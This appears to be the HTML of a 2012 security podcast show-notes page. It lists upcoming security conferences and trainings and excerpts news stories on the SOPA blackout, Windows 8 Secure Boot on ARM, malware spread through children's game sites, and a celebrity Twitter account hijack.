	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.csmonitor.com/USA/Society/2012/0117/Wikipedia-blackout-Why-even-supporters-question-anti-SOPA-move"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.csmonitor.com/USA/Society/2012/0117/Wikipedia-blackout-Why-even-supporters-question-anti-SOPA-move</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the fracas over the proposed federal anti-privacy legislation known as SOPA heats up this week, the open-source encyclopedia website, Wikipedia, says it will shut down for 24 hours, beginning midnight Tuesday to protest what the website warns is a threat to free speech.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead of its usual homepage, users who navigate to the English-language Wikipedia Wednesday will find directions for reaching local members of Congress to protest the Stop Online Piracy Act (SOPA) and the Protect Intellectual Property Act (PIPA). Wikipedia founder Jimmy Wales said in a statement Monday, he hopes this &quot;will melt phone systems in Washington.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A House subcommittee was scheduled to prepare SOPA for a vote later this month. The Senate had planned a vote on PIPA even sooner. Now, it appears both votes could be delayed as some supporters in the House and Senate suggest they may be open changes in the bill.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.readwriteweb.com/enterprise/2012/01/microsoft-says-no-to-disabling.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.readwriteweb.com/enterprise/2012/01/microsoft-says-no-to-disabling.php</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Remember last year when questions arose about Microsoft&#39;s policies on UEFI secure boot on Windows 8? Microsoft&#39;s response, or lack thereof, was that &quot;OEMs are free to choose&quot; how or whether to enable turning off secure boot on systems shipping Windows 8. It appears, however, OEMs may not be as free to choose if they&#39;re shipping ARM hardware.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Glyn Moody points out a clause from Microsoft&#39;s</span><a href="http://msdn.microsoft.com/library/windows/hardware/hh748188"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Hardware Certification Requirements</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for Windows 8 on page 116, that says &quot;Disabling Secure MUST NOT be possible on ARM systems.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&#39;d hoped to get some clarification from Microsoft, but no such luck. I contacted Microsoft&#39;s PR firm this morning and was told &quot;we have nothing more to share about UEFI at this time.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Moody paints this as a Microsoft vs. Linux situation, but does Microsoft really need to worry about Linux on tablets and phones? Perhaps there&#39;s a contingent that would try to boot Maemo, MeeGo, Tizen or whatever it&#39;s called this week, but in large enough numbers to threaten Microsoft? It seems doubtful.</span><img height="216px;" src="https://lh6.googleusercontent.com/lAnij0g63hPgaISRK5IgEPkujq8UPblCuFwtZU-FkVIqU014OawiFiYyJwwFUqx5466JXpZRDd3w714la2zG_1__rOv_kcv3DLjOfMiztqAw9_x-I20" width="697px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So why prevent disabling secure boot? Aside from a reflexive lockdown on tablets and phones, you&#39;ve got me. Microsoft won&#39;t have the same kind of problems with copyright infringement on ARM devices it has on x86/AMD64 computers. If you buy a tablet or phone running Windows 8, you&#39;ve already paid for Windows, right?</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.techweekeurope.co.uk/news/hackers-hijack-the-register-and-the-telegraph-38660"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techweekeurope.co.uk/news/hackers-hijack-the-register-and-the-telegraph-38660</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.dailymail.co.uk/sciencetech/article-2087257/Hackers-target-children-cartoon-gaming-websites-secretly-infect-parents-PCs.html?ITO=1490"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.dailymail.co.uk/sciencetech/article-2087257/Hackers-target-children-cartoon-gaming-websites-secretly-infect-parents-PCs.html?ITO=1490</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Children are the latest target for writers of computer viruses &#8211; seen as an easy &#39;way in&#39; to their parents PCs.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers are targeting children with sites that install malicious software on PCs, disguised as innocent-looking cartoon gaming websites.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the sites quietly load programs onto the PCs which lurk in the background, which can steal information from adults, long after the children have logged off.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Children are the latest target for writers of computer viruses &#8211; seen as an easy &#39;way in&#39; to their parents PCs.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers are targeting children with sites that install malicious software on PCs, disguised as innocent-looking cartoon gaming websites.</span><img height="255px;" src="https://lh6.googleusercontent.com/oqtK_mSJWhC4CZmM0b2PUQq0vx-Z61Q7emsbTFTG7Gl1KdZVVSrA3RIvhzmNPeenf2ez-FnK9HB6pQYqAY3e1aT6zputfJG_ZxcYjEPL6Zx_uoJtXJY" width="233px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the sites quietly load programs onto the PCs which lurk in the background, which can steal information from adults, long after the children have logged off.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Youngsters are seen as easy targets, because they &nbsp;will not stop and think before clicking on a link, whereas adults tend to be slightly more cautious.&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Children are targeted using sites that offer free games &#8211; with one, CuteArcade.com reportedly infecting 12,600 computers, according to Czech security firm Avast virus lab.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Others such as HiddenNinjaGames.com also pose a risk, says the security firm.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.computerworld.com/19585/dumb_hacker_tweets_foursquare_location_while_hacking_ashton_kutcher"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.computerworld.com/19585/dumb_hacker_tweets_foursquare_location_while_hacking_ashton_kutcher</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Idiots, the world is full of them and sometimes that includes stupid social media hackers. Poor password practices allow Twitter accounts to be compromised every day, but yesterday several high profile Twitter accounts were hacked, </span><a href="https://twitter.com/aplusk"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Ashton Kutcher</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the Huffington Post, and actor</span><a href="https://twitter.com/ericstonestreet/status/158397912974499840"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Eric Stonestreet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. What makes this interesting is the degree of stupidity committed when hijacking Kutcher&#39;s account . . . at the very least, tweeting via a FourSquare check-in would be consider a dumb hack.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kutcher has over 9 million followers on Twitter and the alleged &quot;new&quot; relationship is what the hacker focused on to cause havoc. Of course all of the fake tweets have been deleted, but Ashton Kutcher (@aplusk) had both his FourSquare and connected Twitter acounts hacked. Those deleted false tweets were preserved and</span><a href="http://www.celebritytweet.com/aplusk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">posted on Celebrity Tweet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> which has the classy tagline of &quot;Stalk Celebrities on Twitter!&quot;</span><img height="441px;" src="https://lh6.googleusercontent.com/46FmdojH_cCryVb7yUZ0M7NfMBj3ZXbNVcx8EdLC_45wPujW1VAb8hc1Fnf-bPJcJROMAenBSfvHXBkOWZdtnRtI4D8PD7PzqXtLcbKRWgqJWFLzRic" width="667px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No you can&#39;t find her house with the above links as they were deleted. While the hacker may have thought tweeting locations to Kutcher&#39;s alleged new love interest was clever, the hacker was not bright enough to realize his or her own location was broadcast via FourSquare. It took Kutcher about six hours to realize his accounts were compromised, but then he tweeted:</span><img height="287px;" src="https://lh4.googleusercontent.com/V4Kiv5e1MfzMLOhaSR9Y8ky951cZJUR5VVsrENqv3hDEIuCxmu4Nq8KlOB0eNFGDBjw7suEKHve1luaSANGY5QABrCKjM_sXc5LtXOO2uh_6oEml_sI" width="665px;" /></p>
